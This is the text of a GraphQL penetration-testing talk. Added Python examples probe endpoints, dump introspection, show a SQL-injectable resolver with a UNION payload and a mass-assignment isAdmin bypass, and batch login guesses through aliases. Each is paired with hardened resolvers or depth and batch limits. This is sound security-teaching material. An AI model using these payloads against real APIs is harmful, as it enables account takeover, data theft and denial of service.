Pentest Application With
GraphQL
Presented By:
Divyanshu Shukla
(@justm0rph3u5)
Agenda
• What is GraphQL
• REST vs GraphQL
• Example for REST/GraphQL
• Architecture
• Basics
• Pentesting GraphQL
What Is GraphQL?
• An API query language and runtime created and open-sourced by Facebook.
• GraphQL is a query language for APIs, not for databases.
• It is database agnostic and can sit in front of any data source wherever an API is used.
• GraphQL enables declarative data fetching: the client states exactly which fields it wants.
• GraphQL is used in production by companies such as GitHub, Twitter and Coursera.
REST vs GraphQL
• Multiple round trips to fetch related resources in REST; one nested query in GraphQL.
• Over-fetching / under-fetching: a REST endpoint returns a fixed shape, GraphQL returns only the requested fields.
• Rapid product iterations on the frontend without new server endpoints.
• Benefits of a schema and type system shared between client and server.
REST vs GraphQL Example
REST Example
GraphQL Example
Architecture
Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
Basic Terminology
• Schema Definition Language
• Object Types & Fields
• Arguments
• Aliases
• Fragments
• Variables
• Directives
• Types of Requests:
  o Query
  o Mutations
  o Subscriptions
Pentesting GraphQL
• Tools
• Enumeration
• Introspection
• SQL Injection
• Information Disclosure
• Broken Access Control
• Authorization Bypass
• Brute Force/Denial Of Service
Tools
• Altair GraphQL Client / GraphQL IDE.
• GraphQL Raider (Burp Suite extension).
• GraphQL_Introspection.py (Python script by Doyensec).
• GraphQL Voyager (https://apis.guru/graphql-voyager/) to visualise an introspected schema.
GraphQL Tip
• Pentesting an app that uses GraphQL? POST is the common transport, but many servers accept GET as well (for queries; mutations are expected over POST). URL-encode the document and hit /graphql?query=. For example, a schema request as GET:
https://example.com/graphql?query={__schema%20{%0atypes%20{%0aname%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}
Thanks to https://twitter.com/coffeetocode
Enumeration
• Watch the application's traffic in a proxy for requests to the usual GraphQL paths:
  o /graphql/
  o /graphql/console/
  o /graphql.php
  o /graphiql/
  o /graphiql.php
• Send a malformed document (for example an empty selection set, {}) to a candidate path. A reply of "Syntax Error: Expected Name, found }" confirms a GraphQL parser behind it.
• GraphQL endpoints may expose a GUI (GraphiQL or a playground); if present, its Docs panel shows the schema directly.
Introspection
• GraphQL lets a client query the schema itself through the __schema and __type meta-fields: an introspection query returns every type, field, argument and description.
• It is the equivalent of the information_schema tables in a database.
• For an attacker it lists which queries and mutations exist and which arguments they take, including arguments the frontend never sends.
• GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d
• Developers can disable introspection in production, but many deployments leave it enabled.
• Hands-On: HackerOne
Ref: https://graphqlmastery.com/blog/graphql-introspection-and-introspection-queries
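The GraphQL Tip, Enumeration and Introspection slides above describe one workflow: find the endpoint, fingerprint it with a malformed document, then pull the schema and read off the operations and their arguments. The script below is an added example in standard-library Python, not the Doyensec script or any other tool from the slides. CANDIDATE_PATHS mirrors the enumeration slide; SAMPLE_INTROSPECTION is a constructed introspection reply (abridged to the parts the code reads), not data from a real target, and probe() is the only function that touches the network.

```python
"""Find a GraphQL endpoint, fingerprint it, and turn introspection output into a list of
operations and their arguments. Added example, stdlib only; sample data is constructed."""
import json
import urllib.error
import urllib.parse
import urllib.request

CANDIDATE_PATHS = ["/graphql", "/graphql/console", "/graphql.php", "/graphiql", "/graphiql.php"]

# Empty selection set: a GraphQL parser rejects it with "Syntax Error: Expected Name, found }".
MALFORMED_DOC = "{}"

# Enough of the introspection query to list root operations, their arguments and field names.
INTROSPECTION_DOC = """query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types { name kind fields { name args { name type { name kind ofType { name kind ofType { name } } } } } }
  }
}"""


def build_get_url(endpoint: str, document: str) -> str:
    """GraphQL over GET: the document travels URL-encoded in ?query= (the slide's tip)."""
    return endpoint + "?" + urllib.parse.urlencode({"query": document})


def build_post_request(endpoint: str, document: str, variables=None) -> urllib.request.Request:
    """The more common transport: a JSON body carrying query and variables."""
    body = json.dumps({"query": document, "variables": variables or {}}).encode()
    return urllib.request.Request(endpoint, data=body, method="POST",
                                  headers={"Content-Type": "application/json"})


def is_graphql_error_body(body: str) -> bool:
    """True when the response is a GraphQL error document complaining about our bad syntax."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    errors = doc.get("errors") if isinstance(doc, dict) else None
    return bool(errors) and any("Expected Name" in str(e.get("message", ""))
                                for e in errors if isinstance(e, dict))


def probe(base_url: str, timeout: float = 5.0) -> dict:
    """Hit each candidate path with the malformed document; True means 'answers like GraphQL'."""
    results = {}
    for path in CANDIDATE_PATHS:
        url = build_get_url(base_url.rstrip("/") + path, MALFORMED_DOC)
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:        # a syntax error is usually served as HTTP 400
            body = err.read().decode(errors="replace")
        except (urllib.error.URLError, OSError):
            continue
        results[path] = is_graphql_error_body(body)
    return results


def _named_type(t: dict) -> str:
    """Peel NON_NULL / LIST wrappers down to the named type, e.g. [String!]! -> String."""
    while t and t.get("name") is None and t.get("ofType"):
        t = t["ofType"]
    return (t or {}).get("name") or "?"


def attack_surface(introspection_response: dict) -> dict:
    """Map 'query.<field>' / 'mutation.<field>' -> {argument: type}: which requests exist and
    what they take, including arguments the UI never sends (isAdmin in the sample)."""
    schema = introspection_response["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    surface = {}
    for key, label in (("queryType", "query"), ("mutationType", "mutation")):
        root = schema.get(key)
        if not root:
            continue
        for fld in types[root["name"]].get("fields") or []:
            surface[f"{label}.{fld['name']}"] = {a["name"]: _named_type(a["type"])
                                                 for a in fld.get("args") or []}
    return surface


# Constructed introspection reply shaped like a real one (abridged to what attack_surface reads).
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "users", "args": []},
            {"name": "user", "args": [{"name": "id", "type": {"kind": "NON_NULL", "name": None,
                                                              "ofType": {"kind": "SCALAR", "name": "ID"}}}]}]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            {"name": "createPerson", "args": [
                {"name": "username", "type": {"kind": "SCALAR", "name": "String"}},
                {"name": "password", "type": {"kind": "SCALAR", "name": "String"}},
                {"name": "isAdmin", "type": {"kind": "SCALAR", "name": "Boolean"}}]}]},
        {"name": "User", "kind": "OBJECT", "fields": [{"name": "id", "args": []}, {"name": "email", "args": []}]},
    ]}}}

if __name__ == "__main__":
    print(build_get_url("https://example.com/graphql", INTROSPECTION_DOC))
    for op, args in attack_surface(SAMPLE_INTROSPECTION).items():
        print(op, args)
```

Against a live target, replace the sample with the JSON returned for INTROSPECTION_DOC; the `mutation.createPerson` entry then tells you whether an `isAdmin` argument exists before you ever send the authorization-bypass mutation from the later slide.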
Injection
• Most applications sit on top of some database, so arguments that reach resolvers are candidates for SQL injection, NoSQL injection and other injections.
• Detect SQL injection with the usual error-based and time-based payloads in query arguments, then exploit it with UNION SELECT.
• sqlmap can also be used for exploitation: save the request from the proxy and mark the injection point in the JSON body with an asterisk.
• There is a good chance that more than one argument is vulnerable, so test every argument of every operation.
• Example: https://blog.usejournal.com/time-based-blind-sql-injection-in-graphql-39a25a1dfb3c
• Hands On: https://pentesterlab.com/exercises/graphql_ii/course
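To make the injection point concrete, here is an added example of a `user(id:)` resolver that concatenates its GraphQL argument into SQL, beside the parameterised version, with the error-based, boolean-based and UNION probes a tester would send as the value of the `id` variable. This is not code from the slides or from the linked write-up; the SQLite table, the operation name and the payloads are constructed for illustration.

```python
"""Vulnerable vs. parameterised resolver for user(id: ID!), plus the probes that tell them apart.
Added example; the in-memory table and sample hashes are constructed, not real data."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password_hash TEXT, is_admin INTEGER);
INSERT INTO users VALUES (1, 'admin', 'admin@example.com', '5f4dcc3b5aa765d61d8327deb882cf99', 1);
INSERT INTO users VALUES (2, 'alice', 'alice@example.com', '2ab96390c7dbe3439de74d0c9b0b1767', 0);
""")

# The document stays fixed; payloads travel in the variables object, which keeps the JSON valid.
USER_DOC = "query ($id: ID!) { user(id: $id) { id username email } }"


def request_body(payload: str) -> dict:
    return {"query": USER_DOC, "variables": {"id": payload}}


def resolve_user_vulnerable(args: dict) -> list:
    """Resolver that interpolates the argument into the SQL string (the bug)."""
    sql = f"SELECT id, username, email FROM users WHERE id = '{args['id']}'"
    return conn.execute(sql).fetchall()


def resolve_user_safe(args: dict) -> list:
    """Same resolver with a bound parameter: the argument can only ever be a value."""
    return conn.execute("SELECT id, username, email FROM users WHERE id = ?",
                        (args["id"],)).fetchall()


# Payloads sent as the id variable.
UNION_PAYLOAD = "x' UNION SELECT id, username, password_hash FROM users--"


def error_probe(resolver) -> str:
    """Error-based detection: a lone quote that reaches the SQL parser surfaces as a DB error,
    which a verbose GraphQL server copies into its errors array."""
    try:
        resolver({"id": "1'"})
        return ""
    except sqlite3.Error as err:
        return str(err)


def boolean_sqli_detected(resolver, base: str = "1") -> bool:
    """Boolean-based detection: a vulnerable resolver returns the baseline row for the TRUE
    payload and nothing for the FALSE one; a parameterised resolver returns nothing for both."""
    baseline = resolver({"id": base})
    true_rows = resolver({"id": base + "' AND '1'='1"})
    false_rows = resolver({"id": base + "' AND '1'='2"})
    return true_rows == baseline and false_rows != baseline


if __name__ == "__main__":
    print("error probe:", error_probe(resolve_user_vulnerable) or "no error")
    print("boolean sqli:", boolean_sqli_detected(resolve_user_vulnerable))
    print("union dump:", resolve_user_vulnerable({"id": UNION_PAYLOAD}))
    print("safe resolver, same payload:", resolve_user_safe({"id": UNION_PAYLOAD}))
    print("request body:", request_body(UNION_PAYLOAD))
```

The UNION payload works because the vulnerable query selects three columns; against a real target the column count and a trailing comment sequence for that database are the first things to adjust.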
Information Disclosure
• GraphQL is just a layer between client apps and the backend data sources; errors raised in those layers tend to leak through the response's errors array.
• Try url/graphql.php?debug=1 to find a debug mode with additional error reporting.
• Insert a single or double quote into arguments to provoke errors that reveal the server stack and the GraphQL implementation.
• Walk through id values in user queries; where object-level checks are missing this returns other users' details (or nothing, if everything is configured correctly).
Broken Access Control
• Broken access control lets a low-privileged user read other users' records; an admin email obtained this way can then feed a brute-force of login credentials to gain admin-level access.
• Steps to reproduce:
• Authenticated as a normal user, request other users' profile details such as id and email through the users query.
• Vulnerable GraphQL query:
query {
  users {
    id
    email
    isAdmin
    isActive
  }
}
Authorization Bypass
• Suppose we can create users:
mutation {
  createPerson(username: "User1", password: "user1") { id }
}
• If the handler on the server also accepts an isAdmin parameter (introspection reveals such arguments), we can send a request of the form:
mutation {
  createPerson(username: "User1", password: "user1", isAdmin: true) { id }
}
• and make the user User1 an administrator. (GraphQL boolean literals are lowercase, and a selection set cannot be empty, so a field such as id is requested.)
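The two slides above, Broken Access Control and Authorization Bypass, are the same mistake on the read and the write side: resolvers that trust the caller. The following is an added example in plain Python with no GraphQL library: each resolver receives the parsed arguments plus a context object carrying the authenticated caller, which is the shape graphene or ariadne hand to resolvers. The `Viewer` type, the in-memory `USERS` store and `seed()` are constructed for the example; the vulnerable versions reproduce what the slides exploit, the hardened versions show the fix.

```python
"""users query and createPerson mutation resolvers, vulnerable and hardened.
Added example; the store, the accounts and the Viewer context are constructed here."""
import hashlib
import os
from dataclasses import dataclass


@dataclass
class Viewer:
    """Who is calling, taken from the session or token, never from query arguments."""
    id: int
    is_admin: bool = False


USERS: dict = {}            # id -> record; stands in for the users table


def _hash_password(password: str) -> str:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def seed() -> None:
    """Two constructed accounts: user 1 is the admin, user 2 a regular user."""
    USERS.clear()
    USERS[1] = {"id": 1, "username": "admin", "email": "admin@example.com",
                "password_hash": _hash_password("s3cret"), "isAdmin": True, "isActive": True}
    USERS[2] = {"id": 2, "username": "alice", "email": "alice@example.com",
                "password_hash": _hash_password("hunter2"), "isAdmin": False, "isActive": True}


# ---- vulnerable: what the two slides exploit ------------------------------------------

def users_vulnerable(viewer: Viewer) -> list:
    """Broken access control: any caller gets every user's email and isAdmin flag."""
    return [dict(u) for u in USERS.values()]


def create_person_vulnerable(args: dict, viewer: Viewer) -> dict:
    """Authorization bypass via mass assignment: every argument, isAdmin included,
    is copied into the record (the plaintext password lands there too)."""
    record = {"id": max(USERS, default=0) + 1, "isAdmin": False, "isActive": True}
    record.update(args)                      # isAdmin: true from the client overrides the default
    USERS[record["id"]] = record
    return record


# ---- hardened ---------------------------------------------------------------------------

PUBLIC_FIELDS = ("id", "username", "isActive")
PRIVATE_FIELDS = ("email", "isAdmin")
CREATE_ARGS = {"username", "password"}       # the only client-settable inputs


def users_safe(viewer: Viewer) -> list:
    """Field-level authorization: private fields only for the caller's own record or for admins."""
    out = []
    for u in USERS.values():
        allowed = PUBLIC_FIELDS + (PRIVATE_FIELDS if viewer.is_admin or viewer.id == u["id"] else ())
        out.append({k: u[k] for k in allowed})
    return out


def create_person_safe(args: dict, viewer: Viewer) -> dict:
    """Allow-list the inputs; privilege flags are set server-side and never taken from the client."""
    unexpected = set(args) - CREATE_ARGS
    if unexpected:
        raise PermissionError(f"unexpected argument(s): {sorted(unexpected)}")
    record = {"id": max(USERS, default=0) + 1, "username": args["username"],
              "password_hash": _hash_password(args["password"]),
              "isAdmin": False, "isActive": True}
    USERS[record["id"]] = record
    return {k: record[k] for k in PUBLIC_FIELDS}   # never echo the hash back


if __name__ == "__main__":
    seed()
    attacker = Viewer(id=2)
    print(users_vulnerable(attacker))
    print(create_person_vulnerable({"username": "User1", "password": "user1", "isAdmin": True}, attacker))
    print(users_safe(attacker))
    try:
        create_person_safe({"username": "User1", "password": "user1", "isAdmin": True}, attacker)
    except PermissionError as err:
        print("rejected:", err)
```

In a real schema the equivalent of the allow-list is simply not declaring `isAdmin` as an argument of `createPerson`; the resolver-side check is the defence in depth for the case where the schema and the handler drift apart.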
Brute Force/Denial Of Service
• Brute-forcing email, id and similar parameters.
• Brute-forcing mutations and similar queries.
• Where no rate limiting is present, a low-privilege or non-admin user can brute-force login credentials and view details that belong to other accounts.
• Deeply nested queries can cause denial of service: every additional level multiplies the work done by the resolvers and the database. The query from the slide, twelve selection sets deep:
query {
  stories {
    title
    body
    comments {
      comment
      author {
        comments {
          author {
            comments {
              comment
              author {
                comments {
                  comment
                  author {
                    comments {
                      comment
                      author {
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
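The defence against the nested query above is to measure the document before executing it. Below is an added example, in plain Python without a GraphQL library, of a small tokenizer that computes selection-set depth and counts root-level fields, which is what a depth-limit middleware does. The alias-batching document goes beyond the slide: it applies the same missing-limit problem to the brute-force bullets, since GraphQL aliases let one request carry many login attempts, which defeats per-request rate limiting. Both documents and the limits in `check_query` are constructed for the example.

```python
"""Depth and batch limits for GraphQL documents. Added example; the two documents are constructed."""
import re

# Strings and comments are matched first so braces inside them are never counted.
TOKEN_RE = re.compile(r'"(?:\\.|[^"\\])*"|#[^\n]*|[{}()]|[A-Za-z_][A-Za-z0-9_]*|[^\s,]')
NAME_RE = re.compile(r'[A-Za-z_][A-Za-z0-9_]*$')


def tokenize(document: str) -> list:
    return [t for t in TOKEN_RE.findall(document) if not t.startswith("#")]


def selection_depth(document: str) -> int:
    """Deepest nesting of selection sets. Braces inside (...) belong to object-literal
    arguments, not to selections, so they are ignored."""
    depth = deepest = paren = 0
    for tok in tokenize(document):
        if tok == "(":
            paren += 1
        elif tok == ")":
            paren -= 1
        elif paren == 0 and tok == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif paren == 0 and tok == "}":
            depth -= 1
    return deepest


def root_field_count(document: str) -> int:
    """Fields or aliases in the top-level selection set: how many operations one request batches."""
    depth = paren = count = 0
    prev = None
    for tok in tokenize(document):
        if tok == "(":
            paren += 1
        elif tok == ")":
            paren -= 1
        elif paren == 0 and tok == "{":
            depth += 1
        elif paren == 0 and tok == "}":
            depth -= 1
        elif paren == 0 and depth == 1 and NAME_RE.match(tok) and prev not in (":", "@", ".", "$"):
            count += 1        # counts the alias (or bare field); the name after "alias:" is skipped
        prev = tok
    return count


def check_query(document: str, max_depth: int = 6, max_root_fields: int = 5):
    """Gate a document the way a depth/batch-limit middleware would. The limits are illustrative."""
    d = selection_depth(document)
    if d > max_depth:
        return False, f"selection depth {d} exceeds {max_depth}"
    n = root_field_count(document)
    if n > max_root_fields:
        return False, f"{n} root fields exceeds {max_root_fields}"
    return True, "ok"


# The slide's stories/comments/author chain, generated with balanced braces: 12 levels deep.
NESTED_QUERY = ("query { stories { title body " + "comments { comment author { " * 5
                + "name" + " }" * 10 + " } }")

# One request, twenty password guesses: aliases batch the same mutation many times.
BATCHED_LOGIN = "mutation { " + " ".join(
    f'a{i}: login(username: "admin", password: "guess{i}") {{ token }}' for i in range(20)) + " }"

if __name__ == "__main__":
    for name, doc in (("nested", NESTED_QUERY), ("batched", BATCHED_LOGIN)):
        print(name, selection_depth(doc), root_field_count(doc), check_query(doc))
```

Production servers usually enforce this with a cost or depth validation rule in the GraphQL library rather than a separate tokenizer, but the two numbers computed here are exactly what those rules look at.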
Reference
• https://github.com/graphql/graphiql
• https://www.slideshare.net/NeeluTripathy2/pentesting-graphql-applications
• https://prog.world/pentest-applications-with-graphql/
• https://www.howtographql.com
• https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
• https://blog.doyensec.com/2018/05/17/graphql-security-overview.html
• https://voidsec.com/graphql-security-overview-and-testing-tips/
• https://ctf.hacker101.com
• https://pentesterlab.com/exercises/graphql_ii/course
Pentest Application With GraphQL | Null Bangalore Meetup